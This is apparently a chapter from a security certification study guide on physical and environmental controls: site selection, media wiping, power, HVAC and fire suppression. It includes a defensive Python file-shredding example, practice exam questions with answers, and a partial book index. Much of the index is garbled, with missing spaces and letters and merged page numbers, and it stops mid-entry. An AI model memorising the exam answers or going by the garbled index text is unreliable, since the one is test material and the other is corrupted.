SITE SELECTION, DESIGN, AND CONFIGURATION

Selection, design, and configuration describe the process of building a secure facility such as a data center, from the site selection process through the final design.
Site selection issues

Site selection is the process of choosing a site to construct a building or data center.
Utility reliability

The reliability of local utilities is a critical concern for site selection purposes. Electrical outages are among the most common of all failures and disasters we experience. Uninterruptible Power Supplies (UPSs) will provide protection against electrical failure for a short period (usually hours or less). Generators provide longer protection but will require refueling in order to operate for extended periods.
Crime

Local crime rates also factor into site selection. The primary issue is employee safety: all employees have the right to a safe working environment. Additional issues include theft of company assets.
Site design and configuration issues

Once the site has been selected, a number of design decisions must be made. Will the site be externally marked as a data center? Is there shared tenancy in the building? Where is the telecom demarc (the telecom demarcation point)?
Site marking

Many data centers are not externally marked to avoid drawing attention to the facility (and the expensive contents within). Similar controls include attention-avoiding details such as muted building design.
Shared tenancy and adjacent buildings

Other tenants in a building can pose security issues: they are already behind the physical security perimeter. Their physical security controls will impact yours: a tenant's poor visitor security practices can endanger your security, for example.
Adjacent buildings pose a similar risk. Attackers can enter a less secure adjacent building and use that as a base to attack an adjacent building, often breaking in through a shared wall.
A crucial issue to consider in a building with shared tenancy is a shared demarc (the demarcation point, where the ISP's (Internet Service Provider) responsibility ends and the customer's begins). Access to the demarc allows attacks on the confidentiality, integrity, and availability of all circuits and the data flowing over them.

SYSTEM DEFENSES
System defenses are one of the last lines of defense in a defense-in-depth strategy. These defenses assume an attacker has physical access to a device or media containing sensitive information. In some cases, other controls may have failed and these controls are the final control protecting the data.
Asset tracking

Detailed asset tracking databases enhance physical security. You cannot protect your data unless you know where (and what) it is. Detailed asset tracking databases support regulatory compliance by identifying where all regulated data is within a system. In case of employee termination, the asset database will show exactly what equipment and data the employee must return to the company. Data such as serial numbers and model numbers is useful in cases of loss due to theft or disaster.
Port controls

Modern computers may contain multiple ports that may allow copying data to or from a system. Port controls are critical because large amounts of information can be placed on a device small enough to evade perimeter contraband checks. Ports can be physically disabled; examples include disabling ports on a system's motherboard, disconnecting internal wires that connect the port to the system, and physically obstructing the port itself.
Drive and tape encryption

Drive and tape encryption protects data at rest and is one of the few controls that will protect data after physical security has been breached. These controls are recommended for all mobile devices and media containing sensitive information that may physically leave a site or security zone. Whole disk encryption of mobile device hard drives is recommended.

Did You Know?
Many breach notification laws concerning Personally Identifiable Information (PII) contain exclusions for lost data that is encrypted.

Media storage and transportation

All sensitive backup data should be stored off-site, whether transmitted off-site via networks or physically moved as backup media. Sites using backup media should follow strict procedures for rotating media off-site.
Media cleaning and destruction

All forms of media should be securely cleaned or destroyed before disposal to prevent object reuse, which is the act of recovering information from previously used objects, such as computer files. Objects may be physical (such as paper files in manila folders) or electronic (data on a hard drive).
Object reuse attacks range from nontechnical attacks such as dumpster diving (searching for information by rummaging through unsecured trash) to technical attacks such as recovering information from unallocated blocks on a disk drive.
Paper shredders

Paper shredders cut paper to prevent object reuse. Strip-cut shredders cut the paper into vertical strips. Cross-cut shredders are more secure than strip-cut and cut both vertically and horizontally, creating small paper confetti.
Overwriting

Overwriting writes over every character of a file or entire disk drive and is far more secure than deleting or formatting a disk drive. Common methods include writing all zeroes or writing random characters. Electronic shredding or wiping overwrites the file's data before removing the FAT entry.
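An added example (not code from the book) of the electronic shredding step described above: a Python routine that overwrites every byte of a file with zeros and then random data, flushes each pass to the device, and only then removes the directory entry. The sample PII file is constructed for the demo; the caveat about flash and journaling file systems is stated in the docstring.

```python
"""Electronic shredding of a file by overwriting.

Added example, not code from the book. It implements the overwriting control
described in the text: every byte of the file is overwritten (a zero pass,
then a random pass), each pass is flushed to the device, and only then is the
directory entry removed. The sample PII file is constructed for the demo.
Caveat: on SSDs (wear leveling) and on copy-on-write or journaling file
systems the old blocks may survive an in-place overwrite, so this suits
magnetic media; elsewhere, encryption plus destruction is the safer control.
"""
import os
import tempfile
from typing import Optional, Sequence

CHUNK = 64 * 1024


def overwrite_file(path: str,
                   passes: Sequence[Optional[bytes]] = (b"\x00", None),
                   unlink: bool = True) -> int:
    """Overwrite path in place once per pass, then optionally unlink it.

    Each pass is a single byte to repeat across the file, or None for random
    bytes from os.urandom. Returns the total number of bytes written.
    """
    size = os.path.getsize(path)
    written = 0
    with open(path, "r+b") as fh:
        for fill in passes:
            fh.seek(0)
            remaining = size
            while remaining > 0:
                n = min(CHUNK, remaining)
                fh.write(os.urandom(n) if fill is None else fill * n)
                remaining -= n
            fh.flush()
            os.fsync(fh.fileno())   # force the pass out of the page cache
            written += size
    if unlink:
        os.unlink(path)             # remove the directory entry last
    return written


def demo() -> dict:
    """Create a constructed PII file, shred it, and report what happened."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    sample = b"name=Jane Doe; ssn=000-00-0000 (constructed sample)\n" * 200
    with os.fdopen(fd, "wb") as fh:
        fh.write(sample)
    size = os.path.getsize(path)

    # First pass only, keeping the file, so the effect can be inspected.
    overwrite_file(path, passes=(b"\x00",), unlink=False)
    with open(path, "rb") as fh:
        after_zero = fh.read()
    all_zero = after_zero == b"\x00" * size
    plaintext_gone = b"000-00-0000" not in after_zero

    # Random pass, then unlink: the "overwrite before removing the entry" step.
    written = overwrite_file(path, passes=(None,), unlink=True)
    return {
        "size": size,
        "all_zero_after_pass1": all_zero,
        "plaintext_gone": plaintext_gone,
        "random_pass_bytes": written,
        "exists_after": os.path.exists(path),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```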
Degaussing and destruction

Degaussing and destruction are controls used to prevent object reuse attacks against magnetic media such as magnetic tapes and disk drives.
Degaussing destroys the integrity of magnetic media such as tapes or disk drives by exposing them to a strong magnetic field, destroying the integrity of the media and the data it contains.
Destruction physically destroys the integrity of magnetic media by damaging or destroying the media itself, such as the platters of a disk drive. Destructive measures include incineration, pulverizing, and bathing metal components in acid.

ENVIRONMENTAL CONTROLS
Environmental controls are designed to provide a safe environment for personnel and equipment. Power, HVAC, and fire safety are considered environmental controls.
Electricity

Reliable electricity is critical for any data center and is one of the top priorities when selecting, building, and designing a site. Electrical faults involve short- and long-term interruption of power, as well as various cases of low and high voltage.

Crunch Time
The following are common types of electrical faults:
Blackout: prolonged loss of power
Brownout: prolonged low voltage
Fault: short loss of power
Surge: prolonged high voltage
Spike: temporary high voltage
Sag: temporary low voltage

Surge protectors, UPSs, and generators

Surge protectors protect equipment from damage due to electrical surges. They contain a circuit or fuse that is tripped during a power spike or surge, shorting the power or regulating it down to acceptable levels.
Uninterruptible Power Supplies (UPSs) provide temporary backup power in the event of a power outage. They may also "clean" the power, protecting against surges, spikes, and other forms of electrical faults.
Generators are designed to provide power for longer periods of time than UPSs and will run as long as fuel is available. Sufficient fuel should be stored on-site for the period the generator is expected to provide power. Refueling strategies should consider a disaster's effect on fuel supply and delivery.
HVAC

HVAC (heating, ventilation, and air conditioning) controls keep the air at a reasonable temperature and humidity. They operate in a closed loop, recirculating treated air. This helps reduce dust and other airborne contaminants. HVAC units should employ positive pressure and drainage.
Data center HVAC units are designed to maintain optimum temperature and humidity levels for computers. Humidity levels of 40-55% are recommended. A commonly recommended set point temperature range for a data center is 68-77°F (20-25°C).
Static and corrosion

Static is mitigated by maintaining proper humidity, grounding all circuits in a proper manner, and using antistatic sprays, wrist straps, and work surfaces. All personnel working with sensitive computer equipment such as boards, modules, or memory chips should ground themselves before performing any work.
High humidity levels can allow the water in the air to condense onto (and into) equipment, which may lead to corrosion. Both static and corrosion are mitigated by maintaining proper humidity levels.
Heat, flame, and smoke detectors

Heat detectors alert when temperature exceeds an established safe baseline. They may trigger when a specific temperature is exceeded or when temperature changes at a specific rate.
Smoke detectors work through two primary methods: ionization and photoelectric. Ionization-based smoke detectors contain a small radioactive source that creates a small electric charge. Photoelectric sensors work in a similar fashion, except that they contain an LED (Light Emitting Diode) and a photoelectric sensor that generates a small charge while receiving light. Both types of alarm alert when smoke interrupts the radioactivity or light, lowering or blocking the electric charge.
Flame detectors detect infrared or ultraviolet light emitted in fire. One drawback to this type of detection is that the detector usually requires line of sight to detect the flame; smoke detectors do not have this limitation.
Personnel safety, training, and awareness

Personnel safety is the number one goal of physical security. This includes the safety of personnel while on-site and off. Safety training provides a skill set such as learning to operate an emergency power system. Safety awareness changes user behavior ("Don't let anyone follow you into the building after you swipe your access card"). Both safety training and awareness are critical to ensure the success of a physical security program. You can never assume that average personnel will know what to do and how to do it: they must be trained and made aware.
Evacuation routes

Evacuation routes should be prominently posted, as they are in hotel rooms. All personnel should be advised of the quickest evacuation route from their areas. Guests should be advised of evacuation routes as well.
All sites should use a meeting point, where all personnel will meet in the event of emergency. Meeting points are critical: tragedies have occurred where a person outside the front of a building does not realize another is outside the back and reenters the building for attempted rescue.
Evacuation roles and procedures

The two primary evacuation roles are safety warden and meeting point leader. The safety warden ensures that all personnel safely evacuate the building in the event of an emergency or drill. The meeting point leader assures that all personnel are accounted for at the emergency meeting point. Personnel must follow emergency procedures and quickly follow the posted evacuation route in case of emergency or drill.
ABCD fires and suppression

The primary safety issue in case of fire is safe evacuation. Fire suppression systems are used to extinguish fires, and different types of fires require different suppressive agents. These systems are typically designed with personnel safety as the primary concern.
Classes of fire and suppression agents

Class A fires are common combustibles such as wood, paper, etc. This type of fire is the most common and should be extinguished with water or soda acid.
Class B fires are burning alcohol, oil, and other petroleum products such as gasoline. They are extinguished with gas or soda acid. You should never use water to extinguish a class B fire.
Class C fires are electrical fires that are fed by electricity and may occur in equipment or wiring. Electrical fires are conductive fires, and the extinguishing agent must be non-conductive, such as any type of gas. Many sources erroneously list soda acid as recommended for class C fires: this is incorrect, as soda acid can conduct electricity.
Class D fires are burning metals and are extinguished with dry powder.
Class K fires are kitchen fires, such as burning oil or grease. Wet chemicals are used to extinguish class K fires. Table 10.1 summarizes classes of fire and suppression agents.

Table 10.1
Classes of Fire and Suppression Agents

Types of fire suppression agents

All fire suppression agents work via four methods (sometimes in combination): reducing the temperature of the fire, reducing the supply of oxygen, reducing the supply of fuel, and interfering with the chemical reaction within fire.
Water

Water suppresses fire by lowering the temperature below the kindling point (also called the ignition point). Water is the safest of all suppressive agents and recommended for extinguishing common combustible fires such as burning paper or wood. It is important to cut electrical power when extinguishing a fire with water to reduce the risk of electrocution.
Soda acid

Soda acid extinguishers use soda (sodium bicarbonate) mixed with water, with a glass vial of acid suspended at the top. In addition to suppressing fire by lowering temperature, soda acid also has additional suppressive properties beyond plain water: it creates foam that can float on the surface of some liquid fires, starving the oxygen supply.
Dry powder

Extinguishing a fire with dry powder (such as sodium chloride) works by lowering temperature and smothering the fire, starving it of oxygen. Dry powder is primarily used to extinguish metal fires. Flammable metals include sodium, magnesium, and many others.
Wet chemical

Wet chemicals are primarily used to extinguish kitchen fires (type K fires in the United States and type F in Europe) but may also be used on common combustible fires (type A). The chemical is usually potassium acetate mixed with water. This covers a grease or oil fire in a soapy film that lowers the temperature.
CO2

Fires require oxygen as fuel, so fires may be smothered by removing the oxygen: this is how CO2 fire suppression works. A risk associated with CO2 is that it is odorless and colorless, and our bodies will breathe it as air. By the time we begin suffocating due to lack of oxygen, it is often too late. This makes CO2 a dangerous suppressive agent, which is only recommended in unstaffed areas such as electrical substations.
Halon and Halon substitutes

Halon extinguishes fire via a chemical reaction that consumes energy and lowers the temperature of the fire. Halon is being phased out, and a number of replacements with similar properties are now used.
Montreal Accord

Halon has ozone-depleting properties. Due to this effect, the 1989 Montreal Protocol (formally called the Montreal Protocol on Substances That Deplete the Ozone Layer) banned production and consumption of new Halon in developed countries by January 1, 1994. Existing Halon systems may be used. While new Halon is not being produced, recycled Halon may be used.

Fast Facts
Recommended replacements for Halon include the following systems:
Argon
FE-13
FM-200
Inergen
FE-13 is the newest of these agents and comparatively safe. It may be breathed in concentrations of up to 30%. Other Halon replacements are typically only safe up to 10-15% concentration.

Sprinkler systems

Wet pipes have water right up to the sprinkler heads: the pipes are "wet." The sprinkler head contains a metal (common in older sprinklers) or small glass bulb designed to melt or break at a specific temperature. Once that occurs, the sprinkler head opens and water flows. Each head will open independently as the trigger temperature is exceeded.
Dry pipe systems also have closed sprinkler heads: the difference is the pipes are filled with compressed air. The water is held back by a valve that remains closed as long as sufficient air pressure remains in the pipes. As the dry pipe sprinkler heads open, the air pressure drops in each pipe, allowing the valve to open and send water to that head.
Deluge systems are similar to dry pipes, except the sprinkler heads are open and larger than dry pipe heads. The pipes are empty at normal air pressure; the water is held back by a deluge valve. The valve is opened when a fire alarm (that may monitor smoke or flame sensors) triggers.
Pre-action systems are a combination of wet, dry, or deluge systems and require two separate triggers to release water. Single interlock systems release water into the pipes when a fire alarm triggers. The water releases once the head opens. Double interlock systems use compressed air (same as dry pipes): the water will not fill the pipes until both the fire alarm triggers and the sprinkler head opens.
Portable fire extinguishers

All portable fire extinguishers should be marked with the type of fire they are designed to extinguish. Portable extinguishers should be small enough to be operated by any personnel who may need to use one.

Summary of Exam Objectives

In this chapter, we discussed a variety of physical and environmental security controls. Safety is the biggest concern of the physical and environmental security domain. For example, while panic bars can lower the security of a data center (an opened emergency door can be used for ingress, without providing any authentication), they make the data center safer. Fast and safe egress trumps any concern for data or assets.
Physical security is implicit in most other security controls and is often overlooked. We must always seek balance when implementing controls from all 10 domains of knowledge. All assets should be protected by multiple defense-in-depth controls that span multiple domains. For example, a file server can be protected by policy, procedures, access control, patching, antivirus, OS hardening, locks, walls, HVAC, and fire suppression systems (among other controls). A thorough and accurate risk assessment should be conducted for all assets that must be protected. Take care to ensure no domains or controls are overlooked or neglected.
We have also shown that proper site selection is critical for any data center; it is difficult to overcome a poor site selection with additional controls. Issues such as topography, crime, and utility reliability factor into site selection choice.

TOP FIVE TOUGHEST QUESTIONS

1. What should not be used to extinguish a class C (United States) fire?
A. Soda acid
B. CO2
C. Inergen
D. FE-13
2. You need to discard magnetic hard drives containing Personally Identifiable Information (PII). Which method for removing PII from the magnetic hard drives is considered best?
A. Overwrite every sector on each drive with zeroes
B. Delete sensitive files
C. Degauss and destroy
D. Reformat the drives
3. What is the primary type of security control offered by employing around-the-clock ingress contraband checks?
A. Preventive
B. Directive
C. Deterrent
D. Corrective
4. What should be true of the single point of entry door that provides access to an area of a business where trade secrets are maintained?
A. The door must be rated to provide an equivalent barrier to entrance as the walls.
B. The door ingress/egress must incorporate capabilities to account for all individuals entering/exiting.
C. The door must not have an easily bypassed locking mechanism due to accountability concerns.
D. The door must provide wholly unimpeded egress during any emergency conditions.
5. Which physical security component incorporates nonrepudiation?
A. Smart cards
B. Contraband checks
C. Turnstiles
D. Security guards

ANSWERS
1. Correct answer and explanation: A. Answer A is correct; class C fires are electrical fires ("C" for conductive). Soda acid contains water, which is an electrical conductor, and should not be used to extinguish a class C fire.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect; all are gases that will not conduct electricity. CO2 gas starves the fire of oxygen, and Inergen and FE-13 are Halon substitutes that chemically interrupt fire.
2. Correct answer and explanation: C. Answer C is correct; degaussing and destroying the hard drives is considered most secure. It offers high assurance that the data has been removed, and visual inspection of the destroyed drives provides assurance against errors made during the destruction process.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect; they all offer weaker protection against exposure of the PII on the drives. Overwriting the disk provides reasonable protection; however, errors made during the overwriting process will not be evident from visual inspection. Deleting sensitive files simply removes the File Allocation Table (FAT) entry; the data usually remains as unallocated space. Reformatting the drives replaces the entire FAT with a new one, but the old data usually remains as unallocated space.
3. Correct answer and explanation: C. Answer C is correct; deterrence is the primary type of control offered by contraband checks, of those listed. Contraband checks are casually thought to be a detective control, but their presence being known makes them also a deterrent to actual threats. The fact that "detective" was not listed makes the answer easier.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect; none of these options are the primary type of control. The checks can lead to a preventive control being employed (assuming a threat is first detected); however, that is not their primary role. Contraband checks offer more than simply indicating expected behaviors, so they are not primarily directive. Though contraband checks can inform corrective actions, they are not themselves primarily a corrective control.
4. Correct answer and explanation: D. Answer D is correct; unimpeded egress during emergency conditions is critical. Remember that safety is the most important factor, even more important than the protection of trade secrets.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect; though each could prove useful from a physical security standpoint, safety is more important and therefore the best answer. Doors should provide a barrier to entry at least equivalent to that of walls. Given that trade secrets are maintained, accounting for all ingress and egress seems appropriate too. Doors also should not be easily bypassed.
5. Correct answer and explanation: A. Answer A is correct. Smart cards incorporate a chip that contains the private key portion of a public/private key pair and can be used to prove that one, and only that one, person could have performed specific actions.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect; they all do not allow for proving that a particular person carried out an action and therefore do not provide nonrepudiation. Contraband checks have little bearing on nonrepudiation. Turnstiles can help to fend off tailgating or piggybacking, which can help to ensure some simple accountability, but would not meet the level of nonrepudiation. Security guards have many uses, and their testimony can prove extremely valuable, but, again, they do not provide for technical nonrepudiation in the way that smart cards do.

Index
Note:Pagenumbersfollowedbyfindicateguresandtindicatetables.
A
Abstraction,96
Accesscontrol
assessments
penetrationtesting,1718
securityassessments,19
securityaudit,18
vulnerabilityscanning,18
authenticationmethods,See(Authenticationmethods)
cornerstoneinformationsecurityconcepts
accountability, 3
authorization, 3
availability, 2
condentiality, 1
DAD, 2
defenseindepth, 4
identityandauthentication, 3

integrity, 2
leastprivilege, 3
nonrepudiation, 3
subjectsandobjects, 3
models
accessreviewandaudit, 6
ACL, 5
centralizedaccesscontrol, 5
DAC, 4
diameter, 6
MAC, 4
PAPandCHAP, 7
provisioninglifecycle,56
RADIUS, 6
RBAC,45
rulebasedaccesscontrol, 5
TACACSandTACACS+, 6
userentitlement, 6
technology
FIdM,16
Kerberos,1617
SESAME,17

SingleSignOn,16
types,78
Accesscontrollists(ACLs), 5
Accesscontrolmatrix,111
Accreditation,113114
Adaptivechosenciphertext,86
Adaptivechosenplaintext,86
Administrative/regulatorylaw,157
Administrativesecurity
backgroundchecks,119
clearance,118
labels,117118
mandatoryleave/forcedvacation,118
NDA,119
rotationofduties,118
separationofduties,118
Advanceandprotecttheprofession,167
AdvancedEncryptionStandard(AES),83
Agilesoftwaredevelopment,65
Annualizedlossexpectancy(ALE)
ARO,48
assetvalue,4748
denition,47
exposurefactor,48
SLE,48
AnnualRateofOccurrence(ARO),48
Antivirus,34
Applets,107

Applicationdevelopmentsecurity
agilesoftwaredevelopment,65
RAD,65
SDLC,6566
spiralmodel,65
waterfallmodel,65
Applicationlayer,26
Arithmeticlogicunit(ALU),98
Assemblylanguage,64
Assetmanagement,121122
Assetvalue(AV),4748
Asymmetricencryption
discretelogarithm,84
ECC,85
primenumberfactoring,84
privatekey,84
tradeos,85
Asynchronousdynamictokens,11
Authentication,authorization,andaccountability(AAA),23
AuthenticationHeader(AH),90
Authenticationmethods
asynchronousdynamictokens,11
biometriccontrol
dynamicsignatures,15
facialscan,15
ngerprints,13
handgeometry,1415
irisscan,14
keyboarddynamics,15

retinascan,1314
voiceprint,15
biometricsystems
crossovererrorrate,1213,13f
enrollmentandthroughput,12
falseacceptrate,12
falserejectrate,12
locationbasedaccesscontrol,15
multifactorauthentication, 9
passwords
bruteforcea acks, 6
cracking,10
dictionarya ack,10
dynamicpasswords, 9
hashing,10
hybrida ack,10
onetimepasswords, 9
passphrases, 9
rainbowtable, 6
salt,1011
staticpasswords, 9
synchronousdynamictokens,11
B
Baselining,121
BasicInputOutputSystem(BIOS),102

BCP,SeeBusinessContinuityPlanning(BCP)
BellLaPadulamodel,109110
Bibamodel,110111
Biometricsystems
crossovererrorrate,1213,13f
enrollmentandthroughput,12
falseacceptrate,12
falserejectrate,12
Bluetooth,38
Bollard,172
BrewerNashmodel,111
Bruteforcea acks, 6
Bueroverows,105
BusinessContinuityInstitute(BCI),150
BusinessContinuityPlanning(BCP)
changemanagement,148149
denition,135
development
BIA,140142
CallTree,144145
contingencyplanningguide,139140
criticalstateassessment,140
plans,144
preventivecontrols,142143
projectinitiation,140
recoverystrategy,143144
disaster/disruptiveevents,137138
disasterrecoveryprocess,138139

vs.DRP,136137
faults,149
frameworks
BCI,150
ISO/IEC27031,149150
NISTSP80034,149
BusinessImpactAnalysis(BIA),140142
Bytecode,64
C
Cablemodems,40
Cachememory,100
CallTree,144145
CapabilityMaturityModel(CMM),7071
Ceilings,174
Centralprocessingunit(CPU)
ALU,98
CISC,100
fetchandexecute,98
interrupt,99
multiprocessing,99100
multitasking,99
pipelining,9899
processandthreads,99
RISC,100
CerticateRevocationLists(CRL),89
ChallengeHandshakeAuthenticationProtocol(CHAP), 7 ,35
Changemanagement,122
Chinesewallmodel,111

CipherBlockChaining(CBC),81
Civillaw,155156,157
ClarkWilsonmodel,111
Clearance,118
ClosedCircuitTelevision(CCTV),172
Closedsourcesoftware,64
Cloudcomputing,103104
Coldsite,144
Commonlaw,156
Compilers,64
ComplexInstructionSetComputer(CISC),100
ComponentObjectModel(COM),68
Computerbus,97
Computercrimes,158
ComputerFraudandAbuseAct,163
ComputerSecurityIncidentResponseTeam(CSIRT),127
Computerviruses,106
Condentiality,integrity,andavailability(CIA),12
Congurationmanagement,121122
ContinuityofOperations
fullbackup,123
incremental/dierentialbackup,123
RAID,See(Redundantarrayofinexpensivedisks(RAID))
SLA,123
systemredundancy,127
Contrabandchecks,174
ControlObjectivesforInformationandrelatedTechnology(COBIT),58
Copyright,159
Covertchannel,105

Criminallaw,156157
Crippleware,64
Crossovererrorrate(CER),1213
Cryptography
SeealsoEncryption
adaptivechosenciphertext,86
adaptivechosenplaintext,86
authentication,78
bruteforcea ack,86
chosenciphertext,86
chosenplaintexta ack,86
condentialityandintegrity,78
denition,77
dierentialcryptanalysis,87
hashfunction
HAVAL,86
MD5,85
securehashalgorithm,85
implementation
digitalsignatures,88
escrowedencryption,91
IPsec,9091
PGP,91
PKI,89
S/MIME,91
SSLandTLS,8990
knownkeya ack,87
knownplaintexta ack,86
linearcryptanalysis,87

meetinthemiddlea ack,87
monoalphabeticandpolyalphabeticciphers,78
nonrepudiation,78
sidechannela acks,87
strength,78
substitutionandpermutation,78
types,79
XOR,79
Customarylaw,156
D
Databasesecurity,109
Datadestruction,120121
DataEncryptionStandard(DES),80
denition,80
modes
CBC,81
cipherfeedback,81
counter,82
ECB,81
outputfeedback,81
singleDES,82
TDES,82
Datalink,25
Delugesystems,182
DenialofService(DoS),130
Dictionarya ack,10
Dierentialbackup,123
DieHellmanKeyAgreementProtocol,84

Digitalforensics
embeddeddevices,165
mediaanalysis,164
networkforensics,164165
Digitalsignatures,88
DigitalSubscriberLine(DSL),40
DirectSequenceSpreadSpectrum(DSSS),37
Disaster,137138
DisasterRecoveryPlanning(DRP)
vs.BCP,136137
changemanagement,148149
denition,136
development
BIA,140142
CallTree,144145
contingencyplanningguide,139140
criticalstateassessment,140
plans,144
preventivecontrols,142143
projectinitiation,140
recoverystrategy,143144
disaster/disruptiveevents,137138
disasterrecoveryprocess,138139
faults,149
frameworks
BCI,150
ISO/IEC27031,149150
NISTSP80034,149
testing

checklist/consistency,146147
parallelprocessing,147
partialandcompletebusinessinterruption,147148
review,146
simulationtest/walkthroughdrill,147
structuredwalkthrough/tabletop,147
training,148
Disasterrecoveryprocess,138139
Disclosure,alteration,anddestruction(DAD), 2
Discretionaryaccesscontrol(DAC), 4
Diskencryption,34
Disruptiveevents,137138
Distributedcomponentobjectmodel(DCOM),6869
DistributedDenialofService(DDoS),130
Dogs,175
DomainNameSystem(DNS),29
Doors,174
DRP,SeeDisasterRecoveryPlanning(DRP)
Drypipesystems,182
Dynamicpasswords, 9
DynamicRandomAccessMemory(DRAM),101
E
ElectricallyErasableProgrammableReadOnlyMemory(EEPROM),102
Electricity,178
ElectronicCodeBook(ECB),81
EllipticCurveCryptography(ECC),85
EncapsulatingSecurityPayload(ESP),90

Encryption
asymmetricencryption
discretelogarithm,84
ECC,85
primenumberfactoring,84
privatekey,84
tradeos,85
symmetricencryption
AES,83
BlowshandTwosh,83
chaining,80
DES,See(DataEncryptionStandard(DES))
IDEAalgorithm,82
initializationvectors,80
RC5andRC6,83
secretkey,79
streamandblockciphers,80
Endpointsecurity
antivirus,34
applicationwhitelisting,34
diskencryption,34
removablemediacontrols,34
ErasableProgrammableReadOnlyMemory(EPROM),102
Escrowedencryption,91
Ethics
2

(ISC) Code,166167
ComputerEthicsInstitute,167
IAB,168
ExclusiveOr(XOR),79

Exposurefactor(EF),48
ExtensibleAuthenticationProtocol(EAP),3536
ExtensibleMarkupLanguage(XML),108
Extranet,24
ExtremeProgramming(XP),65
F
Falseacceptrate(FAR),12
Falserejectrate(FRR),12
FederatedIdentityManagement(FIdM),16
FileTransferProtocol(FTP),29
Firesuppressionsystems
classesof,180
CO2,181
delugesystems,182
drypipesystems,182
drypowder,181
Halon,182
portablereextinguishers,183
preactionsystems,182183
sodaacid,181
water,180181
wetchemicals,181
wetpipes,182
Firmware,102
Flamedetectors,179
Flashmemory,102
Floors,perimeterdefenses,174
FrameRelay,30

Freeware,64
FrequencyHoppingSpreadSpectrum(FHSS),37
Fullbackup,123
FullDiskEncryption(FDE),34
Fullduplexcommunications,24
G
Globalpositioningsystem(GPS),15
GreatestLowerBound(GLB),110
Gridcomputing,104
H
Halfduplexcommunications,24
Halon,182
Hashfunction
HAVAL,86
MD5,85
securehashalgorithm,85
Hashofvariablelength(HAVAL),86
Heatdetectors,179
Heating,ventilation,andairconditioning(HVAC),178179
Hosttohosttransportlayer,27
Hotsite,143
HypertextTransferProtocol(HTTP),29
HypertextTransferProtocolSecure(HTTPS),29
I
Incidentresponsemanagement
DDoS,130
DoS,130

malware/maliciouscode/software,130
methodology
containmentphase,129
detectionandanalysis,128129
eradicationphase,129
lessonslearnedphase,129
NISTlifecycle,127128,128f
preparation,128
recoveryphase,129
MITM,130
sessionhijacking,129
Incrementalbackup,123
Informationsecuritygovernance
auditingandcontrolframeworks
COBIT,58
ISO17799andISO27000series,58
ITIL,5859
OCTAVE,57
certicationandaccreditation,59
duecareandduediligence,57
personnelsecurity
backgroundcheck,55
employeetermination,5556
outsourcingandoshoring,56
securityawarenessandtraining,56
vendors,consultants,andcontractors,56
privacy,5657
rolesandresponsibility,5455
securitypolicyanddocuments

baselines,54,54t
guidelines,54
policy,5253
standard,54
InformationTechnologyInfrastructureLibrary(ITIL),5859
InformationTechnologySecurityEvaluationCriteria(ITSEC),112113
InternationalDataEncryptionAlgorithm(IDEA),82
Internet,24,2627
InternetActivitiesBoard(IAB),168
InternetControlMessageProtocol(ICMP),28
InternetKeyExchange(IKE),91
InternetProtocolSecurity(IPsec),9091
InternetProtocolversion4(IPv4),2728
InternetProtocolversion6(IPv6),28
Interpretedlanguages,64
IntrusionDetectionSystem(IDS),34
IntrusionPreventionSystem(IPS),34
K
Kerberos, 16–17
Kernel, 102–103
Known key attack, 87
Known plaintext attack, 86
L
Legal systems
  administrative/regulatory law, 157
  civil law, 155–156, 157
  common law, 156
  Computer Fraud and Abuse Act, 163
  contractual security
    attestation, 165
    Right to Penetration Test/Right to Audit, 165–166
    SLA, 165
  criminal law, 156–157
  customary law, 156
  digital forensics
    embedded devices, 165
    media analysis, 164
    network forensics, 164–165
  ethics
    (ISC)² Code, 166–167
    Computer Ethics Institute, 167
    IAB, 168
  information security
    computer crimes, 158
    import/export restrictions, 160
    intellectual property, 158–160
  investigations
    enticement, 161
    entrapment, 161
    evidence, 161
    evidence integrity, 161
  privacy
    European Union, 162
    EU-US safe harbor, 163
    OECD, 162–163
    Privacy Act of 1974, 163
  religious law, 156
  USA PATRIOT Act, 163–164
  vendor governance, 166
Linear cryptanalysis, 87
Local Area Networks (LANs)
  network architecture and design, 29
Location-based access control, 15
M
Magnetic stripe card, 173
Maintenance hooks, 106
Malicious code/malware, 106–107
Malware, 130
Mandatory access control (MAC), 4
Man-in-the-Middle (MITM), 130
Mantrap, 173
Maximum Tolerable Downtime (MTD), 141
Mean Time Between Failures (MTBF), 142
Mean Time to Repair (MTTR), 142
Media Access Control (MAC), 27
Media sanitization, 120–121
Media security
  handling, 119–120
  labeling/marking, 119
  media sanitization/data destruction, 120–121
  retention, 120
  storage, 120
Meet-in-the-middle attack, 87
Memory
  cache memory, 100
  DRAM, 101
  Firmware, 102
  hardware segmentation, 101
  process isolation, 101
  RAM, 100
  ROM, 100
  SRAM, 101
  virtual memory, 101
Message Digest algorithm 5 (MD5), 85
Minimum Operating Requirements (MOR), 142
Mobile site, 144
Modem, 33
Multiprocessing, 99–100
Multiprotocol Label Switching (MPLS), 30
Multitasking, 99
N
National Institute of Standards and Technology (NIST), 127–128, 128f
Network access layer, 26
Network architecture and design
  basic concepts, 23–24
  LAN technology, 29
  OSI model, See Open System Interconnection (OSI) model
  TCP/IP model, See Transmission Control Protocol/Internet Protocol (TCP/IP)
  TCP/IP's application layer, 28–29
  WAN technology, 30
Network attacks
  DoS and DDoS, 130
  malware, 130
  MITM, 129–130
  session hijacking, 129–130
Network devices and protocols
  bridges, 31
  endpoint security product, 34
  IDS and IPS, 34
  modem, 33
  packet filter, 32, 32f
  proxy firewalls, 33
  repeaters and hubs, 30–31
  routers, 32
  stateful firewalls, 32–33
  switch, 31, 31f
Network switch, 31, 31f
Non-disclosure agreement (NDA), 119
Nonrepudiation, 3
O
Object-Oriented Programming (OOP)
  concepts, 67–68
  definition, 66
  ORBs, 68–69
Object Request Brokers (ORBs)
  COM, 68
  DCOM, 68–69
One-time passwords, 9
Open source software, 64
Open System Interconnection (OSI) model, 24
  application layer, 26
  data link, 25
  network, 25
  physical layer, 25
  presentation layer, 26
  session, 25
  transport layer, 25
Open Web Application Security Project (OWASP), 107–108
Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE), 57
Operations security
  administrative security
    background checks, 119
    clearance, 118
    labels, 117–118
    mandatory leave/forced vacation, 118
    NDA, 119
    rotation of duties, 118
    separation of duties, 118
  asset management, 121–122
  continuity of operations
